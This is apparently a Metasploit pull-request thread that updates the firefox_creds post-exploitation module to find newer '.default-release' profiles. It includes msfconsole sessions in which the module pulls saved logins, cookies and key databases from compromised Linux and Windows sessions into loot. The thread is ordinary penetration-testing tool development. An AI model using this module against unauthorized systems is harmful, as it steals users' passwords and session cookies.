Support more recent versions of Firefox's default profile directory

[security-curious]

The default firefox profile directory now no longer ends in .default but instead .default-release. For backwards compat the new regex supports both. For more information see:

https://support.mozilla.org/bm/questions/1264072#answer-1235567

It's possible we might want to also support things like .default-nightly, etc but really if we want to do more than grab the default profile we should read the profiles.ini file to get an itemized list of profiles from Firefox itself. This would also future-proof this script and allow us to capture non-default profiles.

Since profiles are not generally used by most Firefox users just going for the simpler solution of adjusting the regex.

Verification

List the steps needed to make sure this thing works

• Start msfconsole
• use post/multi/gather/firefox_creds
• Verify the thing does what it should

msf6 post(multi/gather/firefox_creds) > set SESSION 1
SESSION => 1
msf6 post(multi/gather/firefox_creds) > run

[*] Checking for Firefox profile in: /home/minhtuan/.mozilla/firefox

[*] Profile: /home/minhtuan/.mozilla/firefox/fvbljmev.default-release
[+] Downloaded logins.json: /home/kali/.msf4/loot/20210310215308_default_172.16.3.129_ff.fvbljmev.logi_049030.bin
[+] Downloaded cookies.sqlite: /home/kali/.msf4/loot/20210310215309_default_172.16.3.129_ff.fvbljmev.cook_856738.bin
[+] Downloaded cert9.db: /home/kali/.msf4/loot/20210310215309_default_172.16.3.129_ff.fvbljmev.cert_400135.db
[+] Downloaded key4.db: /home/kali/.msf4/loot/20210310215309_default_172.16.3.129_ff.fvbljmev.key4_501159.db

[*] Profile: /home/minhtuan/.mozilla/firefox/1snfwp29.default

[*] Post module execution completed

Can test it out yourself on this Vulnhub - https://www.vulnhub.com/entry/bluesky-1,623/

[gwillcox-r7]

Works as mentioned:

msf6 exploit(multi/handler) > use post/multi/gather/firefox_creds
msf6 post(multi/gather/firefox_creds) > show options

Module options (post/multi/gather/firefox_creds):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   DECRYPT  false            no        Decrypts passwords without third party tools
   SESSION                   yes       The session to run this module on.

msf6 post(multi/gather/firefox_creds) > set SESSION 1
SESSION => 1
msf6 post(multi/gather/firefox_creds) > run

[*] Checking for Firefox profile in: C:\Users\test\AppData\Roaming\Mozilla\

[*] Profile: C:\Users\test\AppData\Roaming\Mozilla\Firefox\Profiles\9de42mgk.default-release
[+] Downloaded cert9.db: /home/gwillcox/.msf4/loot/20210312105153_default_172.18.63.23_ff.9de42mgk.cert_045769.bin
[+] Downloaded cookies.sqlite: /home/gwillcox/.msf4/loot/20210312105154_default_172.18.63.23_ff.9de42mgk.cook_412481.bin
[+] Downloaded key4.db: /home/gwillcox/.msf4/loot/20210312105154_default_172.18.63.23_ff.9de42mgk.key4_459487.bin
[+] Downloaded logins.json: /home/gwillcox/.msf4/loot/20210312105155_default_172.18.63.23_ff.9de42mgk.logi_615139.bin

[*] Profile: C:\Users\test\AppData\Roaming\Mozilla\Firefox\Profiles\ytubor4d.default

[*] Post module execution completed
msf6 post(multi/gather/firefox_creds) > 

Will land this in now, thanks for submitting this PR @security-curious and congrats on your first landed MSF PR!

[gwillcox-r7]

Release Notes

Updated the post/multi/gather/firefox_creds module to support gathering profiles from newer versions of Firefox which now use the default profile name of .default-release vs. the old name of .default.